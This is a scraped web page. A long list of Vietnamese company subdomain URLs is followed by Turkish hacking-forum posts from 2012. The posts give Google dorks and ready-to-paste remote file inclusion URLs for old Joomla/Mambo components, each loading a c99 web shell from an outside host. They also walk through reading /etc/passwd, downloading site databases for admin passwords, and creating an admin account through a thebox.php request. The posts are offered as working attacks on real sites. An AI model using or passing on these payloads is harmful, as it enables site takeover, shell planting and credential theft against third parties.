http://tanthuantienpaper.thv.vn/ http://tanthanh.thv.vn/ http://tanthaiphuong.thv.vn/ http://tankynguyenquangngai.thv.vn/ http://tanhungco.thv.vn/ http://taiyovn.thv.vn/ http://tailoc.thv.vn/ http://sts.thv.vn/ http://sqs.thv.vn/ http://sovi.thv.vn/ http://sonlam.thv.vn/ http://songtiennbc.thv.vn/ http://songthuancompany.thv.vn/ http://songthan.thv.vn/ http://songhuonghotel.thv.vn/ http://songhongdanang.thv.vn/ http://songgianh.thv.vn/ http://sinhhocdongduong.thv.vn/ http://sinhhoacuchi.thv.vn/ http://sinhdoi.thv.vn/ http://simco.thv.vn/ http://silversea.thv.vn/ http://sgcsteel.thv.vn/ http://semec.thv.vn/ http://sei.thv.vn/ http://seafood.pnn.vn/ http://sattungthu.thv.vn/ http://satmynghe.thv.vn/ http://sasco.thv.vn/ http://sachtbthlamdong.thv.vn/ http://redbull.thv.vn/ http://quocvinh.thv.vn/ http://quocthanhviettrung.thv.vn/ http://quantrung.thv.vn/ http://quangthanhplastic.thv.vn/ http://quangcaothoidai.thv.vn/ http://ptramesco.thv.vn/ http://pro-vision.thv.vn/ http://posvina.thv.vn/ http://pominasteel.thv.vn/ http://plasmatejsc.thv.vn/ http://phutho.thv.vn/ http://phuocloc.thv.vn/ http://phuochai.thv.vn/ http://phunguyen.thv.vn/ http://phulamplastic.thv.vn/ http://phuhoatan.thv.vn/ http://phucbinhlongsteel.thv.vn/ http://phoviet.thv.vn/ http://phongcachviet.thv.vn/ http://phohoiresort.thv.vn/ http://pharbaco.thv.vn/ http://phanbonvietnhat.thv.vn/ http://phanbonthanhvinh.thv.vn/ http://phanbonthainguyen.thv.vn/ http://phanbonhoasinh.thv.vn/ http://pergola.thv.vn/ http://packexport.thv.vn/ http://orientalsheetpiling.thv.vn/ http://oo7security.thv.vn/ http://ongthepvn.thv.vn/ http://omronhn-hc.thv.vn/ http://ntp.thv.vn/ http://npk.thv.vn/ http://noithatotohuylinh.thv.vn/ http://nhua04.thv.vn/ http://nhaviet.thv.vn/ http://nhatviet.thv.vn/ http://nhatlophat168.thv.vn/ http://nhatlienminh.thv.vn/ http://nhathephungvan.thv.vn/ http://nhakhoanhatnam.thv.vn/ http://nhakhoanhatmy.thv.vn/ http://nhakhoadangluu.thv.vn/ http://nhakhoachaua.thv.vn/ http://nhahangtieccuoitamdac.thv.vn/ http://nhahanghoasu.thv.vn/ http://nguyenphu.thv.vn/ http://nguyenphong.thv.vn/ http://nguyencao.thv.vn/ http://ngonmieng.thv.vn/ http://ngocbinh.thv.vn/ http://ngaphat.thv.vn/ http://namthaison.thv.vn/ http://namgiao.thv.vn/ http://namdinhsteel.thv.vn/ http://myviet.thv.vn/ http://myfatherland.thv.vn/ http://minhtienprinting.thv.vn/ http://minhhoang.thv.vn/ http://minhcuong.thv.vn/ http://miennam.thv.vn/ http://metech.thv.vn/ http://merufa.thv.vn/ http://melinhsteel.thv.vn/ http://mekongtuor.thv.vn/ http://mekongtravel.thv.vn/ http://mekongtour.thv.vn/ http://medicoptic.thv.vn/ http://mayxaydung.thv.vn/ http://maycongtrinh.thv.vn/ http://mangxop.thv.vn/ http://lydiafashion.thv.vn/ http://longthuanphat.thv.vn/ http://longthinh.thv.vn/ http://longdangpapertube.thv.vn/ http://liksin.thv.vn/ http://lifespace.thv.vn/ http://licogi168.thv.vn/ http://lethientao.thv.vn/ http://lequoc.thv.vn/ http://langcobayresort.thv.vn/ http://lamkhaiminh.thv.vn/ http://lamco.thv.vn/ http://kshoabinhdongthap.thv.vn/ http://kl.thv.vn/ http://kimvistainlesssteel.thv.vn/ http://kienhiepthanh.thv.vn/ http://kiengiangcomposite.thv.vn/ http://khuongmaisteel.thv.vn/ http://khaiminh.thv.vn/ http://khaihoan.thv.vn/ http://keodanvainhambaloc.thv.vn/ http://inoxhoabinh.thv.vn/ http://hvd.thv.vn/ http://huyhoangqn.thv.vn/ http://huunghidanang.thv.vn/ http://hutieu.thv.vn/ http://hungvinh.thv.vn/ http://hunggiaphuc.thv.vn/ http://htec.thv.vn/ http://hpsvn.thv.vn/ http://hpssteel.thv.n/ http://honda.thv.vn/ http://hoathuanqn.thv.vn/ http://hoaphatsteel.thv.vn/ http://hoanmyhospital.thv.vn/ http://hfh.thv.vn/ http://hepa.thv.vn/ http://hatien2.thv.vn/ http://hatech.thv.vn/ http://harvestvn.thv.vn/ http://hapexco.thv.vn/ http://hanichemco.thv.vn/ http://haisanmientrung.pnn.vn/ http://haidang.thv.vn/ http://hagiang.thv.vn/ http://hacinco.thv.vn/ http://habac.thv.vn/ http://giayviety.thv.vn/ http://giayviet.thv.vn/ http://giaynham.thv.vn/ http://giaykienhoa.thv.vn/ http://giayhieptri.thv.vn/ http://giaydepnama.thv.vn/ http://giaydanamhai.thv.vn/ http://giayanlac.thv.vn/ http://giayangiang.thv.vn/ http://gatagocong.thv.vn/ http://futco.thv.vn/ http://fatacobt.thv.vn/ http://euroshoes.thv.vn/ http://eresson.thv.vn/ http://ecovico.thv.vn/ http://duythanhplastic.thv.vn/ http://duongthanh.thv.vn/ http://ductriviet.thv.vn/ http://ductansaigon.thv.vn/ http://ductan.thv.vn/ http://ducquang.pnn.vn/ http://ducanhco.thv.vn/ http://donghanh.thv.vn/ http://donghaibentre.thv.vn/ Iss Açığı ile siteye DaLIN !!! Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 2647 Son mesaj: Jan 30, 2012 by scorpion2763
Yeni Site acıkları 2 January 30, 2012 1)Google Araması: inurl:"com_colophon" KOD: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 2)Google Araması: inurl:"com_mgm" KOD: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 3)Google Araması: inurl:"com_mambatstaff" KOD: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 4)Google Araması: inurl:"com_securityimages" KOD: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? KOD: /components/com_securityimages/lang.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 5)Google Araması: inurl:"com_artlinks" KOD: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: //hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 6)Google Araması: inurl:"com_galleria" KOD: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt? ------------------------------------------------------------------------ 7)arama kodu: allinurl:"com_a6mambohelpdesk" expolit http://www.site.com/administrator/co... ://shell.txt -------------------------------------------------------------------------------- 8)Google Araması: inurl:"com_colophon" KOD: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 9)Google Araması: inurl:"com_mgm" KOD: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 10)Google Araması: inurl:"com_mambatstaff" KOD: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 11)Google Araması: inurl:"com_securityimages" KOD: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? KOD: /components/com_securityimages/lang.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 12)Google Araması: inurl:"com_artlinks" KOD: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: //hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 13)Google Araması: inurl:"com_galleria" KOD: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? __________________________________________________ _____________________ 14)Google Araması: inurl:"/admin/configuration. php? Admin paneline direk girme __________________________________________________ _____________________ 15)Google arama kodu allinurlroddetail.asp?prod= Default mb yolu fpdb/vsproducts.mdb Admin girişi vsadmin/login.asp googleden kodumuzu aratalım ..sonra sitemizi buldukmu default.mdb ekleyelim kodunu mdb indirip access le acalım mdb direkt kullanıcı ve şifresiyle Karşımızda. __________________________________________________ ______ Not= Shell Eski Olabilir Değiştirin Yeni Site acıkları 2 Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 2955 Son mesaj: Jan 30, 2012 by scorpion2763
Yeni Site acıkları January 30, 2012 )Google Araması: inurl:index.php?option=com_simpleboard KOD: /components/com_simpleboard/file_upload.php?sbp=http://hlt.atspace.com/c99.txt? --------------------------------------------------------------- 2)Google Araması: inurl:"com_hashcash" KOD: /components/com_hashcash/server.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ------------------------------------------------------------------------------ 3)Google Araması: inurl:"com_htmlarea3_xtd-c" KOD: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ------------------------------------------------------------------------------------ 4)Google Araması: inurl:"com_sitemap" KOD: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? -------------------------------------------------------------------- 5)Google Araması: inurl:"com_forum" KOD: /components/com_forum/download.php?phpbb_root_path=http://hlt.atspace.com/c99.txt? -------------------------------------------------------------------- 6)Google Araması: inurl:"com_pccookbook" KOD: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------------------- 7)Google Araması: inurl:index.php?option=com_extcalendar KOD: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- Google Araması: inurl:"minibb" KOD: components/minibb/index.php?absolute_path=http://hlt.atspace.com/c99.txt? --------------------------------------------------------------------- 9)Google Araması: inurl:"com_smf" KOD: /components/com_smf/smf.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- KOD: /modules/mod_calendar.php?absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 10)Google Araması: inurl:"com_pollxt" KOD: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 11)Google Araması: inurl:"com_loudmounth" KOD: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ------------------------------------------------------------------------ 12)Google Araması: inurl:"com_videodb" KOD: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- (13)Google Araması: inurl:index.php?option=com_pcchess KOD: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 14)Google Araması: inurl:"com_multibanners" KOD: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- 15)Google Araması: inurl:"com_a6mambohelpdesk" KOD: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hlt.atspace.com/c99.txt? ----------------------------------------------------------------------- Yeni Site acıkları Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 7197 Son mesaj: Jan 30, 2012 by scorpion2763
File Manager Acıgı ile siteye dalma January 30, 2012 Şimdi sizlere basit bir file maneger açığı anlatacağım. 1->Bir arama motoruna gidiyoruz. (google , yahoo vb.) 2->"admin/file_manager.php" diye aratıyoruz. 3->Çıkan sitelerden şu url’ye gittiğimizde hedef.com/admin/file_manager.php işte burası file maneger sayfası. 4->Sonra şu şekilde hedef.com/admin/file_manager.php/etc/passwd yazarak sitedeki şifreleride alabiliriz... File Manager Acıgı ile siteye dalma Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 1751 Son mesaj: Jan 30, 2012 by scorpion2763
Admin Paneline Sızma January 30, 2012 Admin paneline sızma %90 Sizlere admin paneline sızmayı soru cewap halinde anlatacagım Soru 1 : hacker abi admin paneli bizim ne işimize yararki Cewap1 : Admin paneli siteyi hacklememizi anasayfasına index basmamıza we kayıtlı kullanıcıların ıp lerini alıp daha sonra pc leine sızmamızı saglar Soru 2 : Peki bunu nasıl yaparız usta?? Cewap : Herkezin bildigi gibi google bizim babamız aşagıda werdigim Kodu googlede aratıyoruz kodumuz : inurl:thebox/thebox.php Bunu tarattıktan sonra karşınıza çıkan sitelerden birini açın we browser adres cubugunuzda site adresi şöyle çıkacak(googlede aratınca çıkcak olan herhangi bir siteye girin) http://www.martin-buber-oberschule.de/thebox/thebox.php (bu site çalışmayabilir ama diyerleri çalışıyor) burdakı thebox.php silin yerine şunu yapıştırın /admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111 YAPIŞTIRIN sonra sizi gırışe yonlendırecektır USER:CLK-J35 PASWORD:111 BUNLARI GIRDIKTEN SONRA ADMIN PANELI ELINIZDE Not:ama mutlaka bu acıkın kapanmadığı sitelerde işe yarar Admin Paneline Sızma Konuyu Başlatan: scorpion2763 Yorumlar: 0 Görünümler: 3034 Son mesaj: Jan 30, 2012 by scorpion2763
Sayfa%Sayfa no%Toplam sayfa% sorted by

Create your own FREE Forum
Report Abuse